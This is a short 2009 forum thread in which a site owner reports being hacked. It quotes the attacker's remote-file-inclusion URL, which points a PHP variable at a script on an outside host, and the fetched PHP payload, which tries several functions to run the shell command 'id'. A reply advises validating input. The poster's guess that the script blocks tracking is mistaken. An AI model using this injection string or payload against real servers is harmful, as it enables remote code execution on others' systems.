Page 1 of 1

Being Hacked

Posted: Sun Jul 12, 2009 12:29 pm
by lupole
Hello all.

I Got hacked last night from Korea Republic ip 210.205.57.2. Browser: libwww-perl/5.79
This was a Bookmark entry and the landing page was:

myhomepage.com/catalog/my-lovemp3-sampledownload-p-172.html?language=de///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt???

Landing page should be this:

myhomepage.com/catalog/my-lovemp3-sampledownload-p-172.html?language=de

without the following:

///?_SERVER[DOCUMENT_ROOT]=http://www.samjinenginc.com/board/readme.txt???

When I point my browser to:

samjinenginc.com/board/readme.txt???

the below script shows. After this, the next stats entry does not show only this error blocking the ip and country addresses:

Warning: gethostbyaddr() [function.gethostbyaddr]: Address is not in a.b.c.d form in /www/myhomepage.com/web/catalog/admin/supertracker.php on line 549

After this entry, all other enties are normal.

Not sure as to the total function of this script, but it appears to be blocking me from getting certain ip addresses, and country information. Is there a way to block this script?

This also blocked my other tracking scripts.

1. | <?php
2. | echo "Mic22";
3. | $cmd="id";
4. | $eseguicmd=ex($cmd);
5. | echo $eseguicmd;
6. | function ex($cfe){
7. | $res = '';
8. | if (!empty($cfe)){
9. | if(function_exists('exec')){
10. | @exec($cfe,$res);
11. | $res = join("\n",$res);
12. | }
13. | elseif(function_exists('shell_exec')){
14. | $res = @shell_exec($cfe);
15. | }
16. | elseif(function_exists('system')){
17. | @ob_start();
18. | @system($cfe);
19. | $res = @ob_get_contents();
20. | @ob_end_clean();
21. | }
22. | elseif(function_exists('passthru')){
23. | @ob_start();
24. | @passthru($cfe);
25. | $res = @ob_get_contents();
26. | @ob_end_clean();
27. | }
28. | elseif(@is_resource($f = @popen($cfe,"r"))){
29. | $res = "";
30. | while(!@feof($f)) { $res .= @fread($f,1024); }
31. | @pclose($f);
32. | }}
33. | return $res;
34. | }
35. | exit;

Thanks

Re: Being Hacked

Posted: Sun Jul 12, 2009 12:55 pm
by matthijs
In your script, how is

Code: Select all

?language=de
being used?

If you validate and filter that input well (as you should do with all input), it should not be possible to inject any code.